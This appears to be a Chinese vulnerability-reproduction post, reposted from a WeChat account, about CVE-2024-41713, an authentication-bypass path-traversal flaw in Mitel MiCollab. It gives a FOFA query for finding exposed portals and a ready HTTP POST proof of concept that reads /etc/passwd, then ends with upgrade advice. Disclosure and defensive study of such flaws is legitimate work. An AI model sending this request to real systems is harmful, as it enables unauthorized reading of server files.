0x01 免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
0x02
产品介绍
Mitel MiCollab是加拿大Mitel(敏迪)公司推出的一款企业级协作平台,旨在为企业提供统一、高效、安全的通信与协作解决方案。通过该平台,员工可以在任何时间、任何地点,使用任何设备,实现即时通信、语音通话、视频会议、文件共享等功能,从而提升工作效率和团队协作能力。适用于各种规模和类型的企业。通过该平台,企业可以提升工作效率、增强团队协作能力、保障信息安全,并推动业务的持续发展。
0x03
漏洞威胁
由于Mitel MiCollab软件的 NuPoint 统一消息 (NPM) 组件中存在身份验证绕过漏洞,并且输入验证不足,未经身份验证的远程攻击者可利用该漏洞执行路径遍历攻击,成功利用可能导致未授权访问、破坏或删除用户的数据和系统配置。
影响范围:
version < MiCollab 9.8 SP2 (9.8.2.12)
0x04
漏洞环境
FOFA:
body="MiCollab End User Portal"
0x05
漏洞复现
PoC
POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (WindowsNT10.0; Win64; x64; rv:132.0) Gecko/20100101Firefox/132.0
Content-Type: application/x-www-form-urlencoded
_transaction=<transactionxmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance"xsi:type="xsd:Object"><transactionNumxsi:type="xsd:long">2</transactionNum><operationsxsi:type="xsd:List"><elemxsi:type="xsd:Object"><criteriaxsi:type="xsd:Object"><reportName>../../../etc/passwd</reportName></criteria><operationConfigxsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValuesxsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction>&protocolVersion=1.0&__iframeTarget__=x
0x06
批量脚本验证
Nuclei验证脚本已发布知识星球:冷漠安全
0x07
修复建议
建议使用受影响产品版本的客户更新到最新版本。
用户应升级到MiCollab 9.8 SP2 (9.8.2.12)或更高版本,以确保其系统免受此关键漏洞的影响。
对于那些无法立即升级的用户,Mitel 还为 9.7 及以上版本提供了一个补丁,在完成全面升级之前提供了一个替代解决方案,同时确保了安全性。该补丁的详细说明可在 Mitel 的知识管理系统 (KMS) 中找到。
0x08
原文始发于微信公众号(冷漠安全):「漏洞复现」Mitel MiCollab 企业协作平台 任意文件读取漏洞(CVE-2024-41713)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论